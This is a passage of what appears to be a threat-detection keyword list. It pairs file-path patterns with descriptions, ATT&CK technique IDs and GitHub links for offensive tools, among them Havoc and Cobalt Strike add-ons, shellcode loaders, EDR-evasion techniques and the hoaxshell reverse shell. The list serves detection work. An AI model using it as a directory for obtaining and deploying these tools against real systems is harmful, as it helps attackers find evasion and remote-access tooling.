- T1096 - T1560","TA0002 - TA0003","N/A","N/A","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","10","10","70","41","2023-09-28T09:00:55Z","2021-01-20T13:03:45Z" +"*/hackingtool.git*","offensive_tool_keyword","hackingtool","ALL IN ONE Hacking Tool For Hackers","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/Z4nzu/hackingtool","1","1","N/A","N/A","10","39278","4350","2023-09-13T19:08:33Z","2020-04-11T09:21:31Z" +"*/Hack-Tools.git*","offensive_tool_keyword","hack-tools","The all-in-one Red Team browser extension for Web Pentester","T1059.007 - T1505 - T1068 - T1216 - T1547.009","TA0002 - TA0001 - TA0009","N/A","N/A","Web Attacks","https://github.com/LasCC/Hack-Tools","1","1","N/A","9","10","5007","586","2023-10-03T15:40:37Z","2020-06-22T21:42:16Z" +"*/Hades.exe*","offensive_tool_keyword","Executable_Files","Database for custom made as well as publicly available stage-2 or beacons or stageless payloads used by loaders/stage-1/stagers or for further usage of C2 as well","T1071 - T1071.001 - T1105 - T1041 - T1102","TA0011 - TA0005 - TA0010","N/A","N/A","Exploitation tools","https://github.com/reveng007/Executable_Files","1","0","N/A","10","1","7","2","2023-09-07T08:36:28Z","2021-12-10T15:04:35Z" +"*/hades.git*","offensive_tool_keyword","hades","Go shellcode loader that combines multiple evasion techniques","T1055 - T1027 - T1218 - T1027.001 - T1036","TA0002 - TA0008","N/A","N/A","Exploitation tools","https://github.com/f1zm0/hades","1","1","N/A","N/A","3","290","44","2023-06-21T19:22:57Z","2022-10-11T08:16:24Z" +"*/HadesLdr.git*","offensive_tool_keyword","HadesLdr","Shellcode Loader Implementing Indirect Dynamic Syscall - API Hashing - Fileless Shellcode retrieving using Winsock2","T1055.012 - T1055.001 - T1547.002","TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/CognisysGroup/HadesLdr","1","1","N/A","10","3","221","33","2023-07-15T21:23:49Z","2023-07-12T11:44:07Z" 
+"*/hades-main.zip*","offensive_tool_keyword","hades","Go shellcode loader that combines multiple evasion techniques","T1055 - T1027 - T1218 - T1027.001 - T1036","TA0002 - TA0008","N/A","N/A","Exploitation tools","https://github.com/f1zm0/hades","1","1","N/A","N/A","3","290","44","2023-06-21T19:22:57Z","2022-10-11T08:16:24Z" +"*/hadoop-datanode-info.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/hadoop-jobtracker-info.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/hadoop-namenode-info.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/hadoop-secondary-namenode-info.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/hadoop-tasktracker-info.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/Hak5.sh*","offensive_tool_keyword","AutoC2","AutoC2 is a bash script written to install all of the red team tools that you know and love","T1059.004 - T1129 - T1486","TA0005 - TA0002 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/assume-breach/Home-Grown-Red-Team/tree/main/AutoC2","1","0","N/A","10","4","348","73","2023-09-30T13:40:08Z","2022-03-23T15:52:41Z" +"*/hakrawler.git*","offensive_tool_keyword","hakrawler","Simple fast web crawler designed for easy and quick discovery of endpoints and assets within a web application","T1190 - T1212 - T1087.001","TA0007 - TA0003 - TA0009","N/A","N/A","Web Attacks","https://github.com/hakluke/hakrawler","1","1","N/A","6","10","3971","458","2023-07-22T19:39:11Z","2019-12-15T13:54:43Z" +"*/hancitor.profile*","offensive_tool_keyword","cobaltstrike","Cobalt Strike Malleable C2 Design and Reference Guide","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - 
T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/BC-SECURITY/Malleable-C2-Profiles","1","1","N/A","10","10","224","42","2023-06-11T17:38:36Z","2020-08-28T22:37:09Z" +"*/handlekatz.py*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","1","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z" +"*/HandleKatz_BOF*","offensive_tool_keyword","cobaltstrike","A BOF port of the research of @thefLinkk and @codewhitesec","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 
- TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/EspressoCake/HandleKatz_BOF","1","1","N/A","10","10","93","17","2021-10-12T21:38:02Z","2021-10-12T18:45:06Z" +"*/HarmJ0y*","offensive_tool_keyword","Github Username","Co-founder of Empire. BloodHound. and the Veil-Framework | PowerSploit developer | krb lover | Microsoft PowerShell MVP | Security at the misfortune of others","N/A","N/A","N/A","N/A","POST Exploitation tools","https://github.com/HarmJ0y","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/HaryyUser.exe*","offensive_tool_keyword","cobaltstrike","A CobaltStrike script that uses various WinAPIs to maintain permissions. including API setting system services. setting scheduled tasks. managing users. etc.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - 
APT29","C2","https://github.com/yanghaoi/CobaltStrike_CNA","1","1","N/A","10","10","403","78","2022-01-18T12:47:55Z","2021-04-21T13:10:11Z" +"*/hash_spider.py*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z" +"*/hashcat*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","0","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*/hashdump_dc*","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). 
with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/offsecginger/koadic","1","1","N/A","10","10","199","62","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z" +"*/Hashi0x/*","offensive_tool_keyword","poc","Windows Message Queuing vulnerability exploitation with custom payloads","T1192 - T1507","TA0002","N/A","N/A","Network Exploitation Tools","https://github.com/Hashi0x/PoC-CVE-2023-21554","1","1","N/A","N/A",,"N/A",,, +"*/hashview.py*","offensive_tool_keyword","hashview","A web front-end for password cracking and analytics","T1110 - T1201","TA0006 - TA0002","N/A","N/A","Credential Access","https://github.com/hashview/hashview","1","1","N/A","10","4","320","38","2023-09-22T21:30:50Z","2020-11-23T19:21:06Z" +"*/havex.profile*","offensive_tool_keyword","cobaltstrike","Malleable C2 is a domain specific language to redefine indicators in Beacon's communication. This repository is a collection of Malleable C2 profiles that you may use. 
These profiles work with Cobalt Strike 3.x","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/rsmudge/Malleable-C2-Profiles","1","1","N/A","10","10","1362","429","2021-05-18T14:45:39Z","2014-07-14T15:02:42Z" +"*/Havoc.cpp*","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","1","N/A","10","10","4898","745","2023-10-04T21:22:20Z","2022-09-11T13:21:16Z" +"*/Havoc.qss*","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - 
TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","1","N/A","10","10","4898","745","2023-10-04T21:22:20Z","2022-09-11T13:21:16Z" +"*/Havoc.rc*","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","1","N/A","10","10","4898","745","2023-10-04T21:22:20Z","2022-09-11T13:21:16Z" +"*/Havoc/data/*","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","1","N/A","10","10","4898","745","2023-10-04T21:22:20Z","2022-09-11T13:21:16Z" +"*/Havoc/main/*","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","1","N/A","10","10","4898","745","2023-10-04T21:22:20Z","2022-09-11T13:21:16Z" +"*/HavocFramework/*","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","1","N/A","10","10","4898","745","2023-10-04T21:22:20Z","2022-09-11T13:21:16Z" 
+"*/HavocImages/*","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","1","N/A","10","10","4898","745","2023-10-04T21:22:20Z","2022-09-11T13:21:16Z" +"*/havoc-py/*","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","1","N/A","10","10","4898","745","2023-10-04T21:22:20Z","2022-09-11T13:21:16Z" +"*/hbase-master-info.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/hbase-region-info.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/hddtemp-info.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/hDendron.cs*","offensive_tool_keyword","Dendrobate","Dendrobate is a framework that facilitates the development of payloads that hook unmanaged code through managed .NET code","T1055.012 - T1059.001 - T1070.004","TA0005 - TA0002","N/A","N/A","Exploitation tools","https://github.com/FuzzySecurity/Dendrobate","1","1","N/A","10","2","122","27","2021-11-19T12:18:50Z","2021-02-15T11:15:51Z" +"*/HeapCrypt.git*","offensive_tool_keyword","HeapCrypt","Encypting the Heap while sleeping by hooking and modifying Sleep with our own sleep that encrypts the heap","T1055.001 - T1027 - T1146","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/HeapCrypt","1","1","N/A","9","3","224","40","2023-08-02T02:24:42Z","2023-03-25T05:19:52Z" +"*/HellsGate.git*","offensive_tool_keyword","HellsGate","The Hell's Gate technique is a method employed by malware to hide its malicious behavior and avoid detection. 
This technique involves executing system calls directly thus bypassing the Windows API (Application Programming Interface) which is typically monitored by EDRs","T1055 - T1548.002 - T1129","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/am0nsec/HellsGate","1","1","N/A","N/A","8","723","117","2021-06-28T15:42:36Z","2020-06-02T17:10:21Z" +"*/Heroinn/*","offensive_tool_keyword","Heroinn","A cross platform C2/post-exploitation framework implementation by Rust.","T1027 - T1033 - T1055 - T1071 - T1082 - T1105 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/b23r0/Heroinn","1","1","N/A","10","10","586","223","2022-10-08T07:27:38Z","2015-05-16T14:54:19Z" +"*/hid_inject.*","offensive_tool_keyword","bettercap","The Swiss Army knife for 802.11 - BLE - IPv4 and IPv6 networks reconnaissance and MITM attacks.","T1046 - T1190 - T1059 - T1053 - T1001.002 - T1110.001 - T1113 - T1132 - T1048","TA0010 - TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0009 - TA0011 - TA0010","N/A","N/A","Network Exploitation tools","https://github.com/bettercap/bettercap","1","1","N/A","N/A","10","14627","1373","2023-09-18T15:43:34Z","2018-01-07T15:30:41Z" +"*/hid_sniff.*","offensive_tool_keyword","bettercap","The Swiss Army knife for 802.11 - BLE - IPv4 and IPv6 networks reconnaissance and MITM attacks.","T1046 - T1190 - T1059 - T1053 - T1001.002 - T1110.001 - T1113 - T1132 - T1048","TA0010 - TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0009 - TA0011 - TA0010","N/A","N/A","Network Exploitation tools","https://github.com/bettercap/bettercap","1","1","N/A","N/A","10","14627","1373","2023-09-18T15:43:34Z","2018-01-07T15:30:41Z" +"*/HiddenDesktop.git*","offensive_tool_keyword","cobaltstrike","Hidden Desktop (often referred to as HVNC) is a tool that allows operators to interact with a remote desktop session without the user knowing. The VNC protocol is not involved but the result is a similar experience. 
This Cobalt Strike BOF implementation was created as an alternative to TinyNuke/forks that are written in C++","T1021.001 - T1133","TA0005 - TA0002","N/A","N/A","C2","https://github.com/WKL-Sec/HiddenDesktop","1","1","N/A","10","10","926","147","2023-05-25T21:27:20Z","2023-05-21T00:57:43Z" +"*/hijack_opener/*.js*","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","N/A","Frameworks","https://github.com/beefproject/beef","1","1","N/A","N/A","10","8796","2026","2023-09-30T17:06:35Z","2011-11-23T06:53:25Z" +"*/hijack_opener/*.rb*","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","N/A","Frameworks","https://github.com/beefproject/beef","1","1","N/A","N/A","10","8796","2026","2023-09-30T17:06:35Z","2011-11-23T06:53:25Z" +"*/HijackHunter/*","offensive_tool_keyword","HijackHunter","Parses a target's PE header in order to find lined DLLs vulnerable to hijacking. Provides reasoning and abuse techniques for each detected hijack opportunity","T1574.002 - T1059.003 - T1078.004","TA0005 - TA0002","N/A","N/A","Exploitation tools","https://github.com/matterpreter/OffensiveCSharp/tree/master/HijackHunter","1","1","N/A","10","10","1214","252","2023-02-06T14:56:26Z","2019-02-06T00:32:29Z" +"*/HInvoke.cs*","offensive_tool_keyword","NixImports","A .NET malware loader using API-Hashing to evade static analysis","T1055.012 - T1562.001 - T1140","TA0005 - TA0003 - TA0040","N/A","N/A","Defense Evasion - Execution","https://github.com/dr4k0nia/NixImports","1","1","N/A","N/A","2","178","23","2023-05-30T14:14:21Z","2023-05-22T18:32:01Z" +"*/hlldz*","offensive_tool_keyword","Github Username","github username. 'My name is Halil Dalabasmaz. I consider myself Pwner.' 
containing exploitation tools","N/A","N/A","N/A","N/A","Exploitation tools","https://github.com/hlldz","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/hnap-info.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/hoaxshell*","offensive_tool_keyword","hoaxshell","An unconventional Windows reverse shell. currently undetected by Microsoft Defender and various other AV solutions. solely based on http(s) traffic","T1203 - T1133 - T1190","TA0001 - TA0002 - TA0006","N/A","N/A","Exploitation tools","https://github.com/t3l3machus/hoaxshell","1","1","N/A","N/A","10","2655","443","2023-06-18T13:26:32Z","2022-07-10T15:36:24Z" +"*/hoaxshell/*.py*","offensive_tool_keyword","Villain","Villain is a C2 framework that can handle multiple TCP socket & HoaxShell-based reverse shells. enhance their functionality with additional features (commands. 
utilities etc) and share them among connected sibling servers (Villain instances running on different machines).","T1021 - T1043 - T1055 - T1071 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/t3l3machus/Villain","1","1","N/A","10","10","3255","534","2023-08-08T06:24:24Z","2022-10-25T22:02:59Z" +"*/holehe.git*","offensive_tool_keyword","holehe","holehe allows you to check if the mail is used on different sites like twitter instagram and will retrieve information on sites with the forgotten password function.","T1598.004 - T1592.002 - T1598.001","TA0003 - TA0009","N/A","N/A","Reconnaissance","https://github.com/megadose/holehe","1","1","N/A","6","10","5662","655","2023-09-15T21:14:10Z","2020-06-25T23:03:02Z" +"*/hollow.x64.*","offensive_tool_keyword","cobaltstrike","EarlyBird process hollowing technique (BOF) - Spawns a process in a suspended state. inject shellcode. hijack main thread with APC and execute shellcode","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - 
APT29","C2","https://github.com/boku7/HOLLOW","1","1","N/A","10","10","235","56","2023-03-08T15:51:19Z","2021-07-21T15:58:18Z" +"*/HookDetector.exe*","offensive_tool_keyword","HookDetector","Detects hooked Native API functions in the current process indicating the presence of EDR ","T1055.012 - T1082 - T1057","TA0007 - TA0003","N/A","N/A","Defense Evasion","https://github.com/matterpreter/OffensiveCSharp/tree/master/HookDetector","1","1","N/A","10","10","1214","252","2023-02-06T14:56:26Z","2019-02-06T00:32:29Z" +"*/hooks/spoof.c*","offensive_tool_keyword","cobaltstrike","Cobalt Strike UDRL for memory scanner evasion.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/kyleavery/AceLdr","1","1","N/A","10","10","714","123","2023-09-28T19:47:03Z","2022-08-11T00:06:09Z" +"*/hop.php*","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. 
